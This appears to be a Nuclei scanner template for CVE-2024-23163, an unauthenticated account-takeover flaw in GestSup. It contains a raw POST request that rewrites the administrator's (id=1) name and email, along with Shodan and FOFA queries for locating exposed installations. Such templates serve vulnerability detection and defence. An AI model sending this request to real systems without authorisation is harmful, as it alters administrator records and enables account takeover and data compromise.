Description
GestSup contains an authentication bypass vulnerability allowing attackers to take over user accounts, leading to full compromise including data disclosure and modification.
GestSup contains an authentication bypass vulnerability allowing attackers to take over user accounts, leading to full compromise including data disclosure and modification.
id: gestsup-account-takeover
info:
name: GestSup - Account Takeover
author: eeche,chae1xx1os,persona-twotwo,soonghee2,gy741
severity: critical
description: GestSup contains an authentication bypass vulnerability allowing attackers to take over user accounts, leading to full compromise including data disclosure and modification.
impact: |
An attacker could bypass the authentication process and access the application as an administrator user by modifying the usermail field to a controlled email address and requesting a password reset.
remediation: Apply necessary security patches or updates provided by the vendor to secure the ticket_user_db.php endpoint and ensure proper authentication checks are in place.
reference:
- https://www.synacktiv.com/advisories/multiple-vulnerabilities-on-gestsup-3244
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23163
- https://doc.gestsup.fr/install/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-287
cpe: cpe:2.3:a:gestsup:gestsup:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: gestsup
fofa-query: title="GestSup"
shodan-query: http.favicon.hash:-283003760
product: gestsup
tags: account-takeover,gestsup,vuln
variables:
email: "{{randstr}}@{{rand_base(5)}}.com"
firstname: "{{rand_base(5)}}"
lastname: "{{rand_base(5)}}"
http:
- raw:
- |
POST /ajax/ticket_user_db.php HTTP/1.1
Host: {{Hostname}}
X-Requested-With: xmlhttprequest
Content-Type: application/x-www-form-urlencoded
modifyuser=1&lastname={{lastname}}&firstname={{firstname}}&phone=&mobile=&mail={{email}}&company=111&id=1
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"status":"success'
- 'firstname":"{{firstname}}","lastname":"{{lastname}}'
condition: and
- type: word
part: header
words:
- 'text/html'
extractors:
- type: dsl
dsl:
- '"Firstname: "+ firstname'
- '"Lastname: "+ lastname'
# digest: 4b0a004830460221008edfd9864003c6f7b01bfe5fe1bfccb3298e6dc1624a426ca8d2805385864be1022100cc5c4b9852e70111619b23ecc9b742aec0dff7f37a4f7fa6f5827073957f7c5e:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.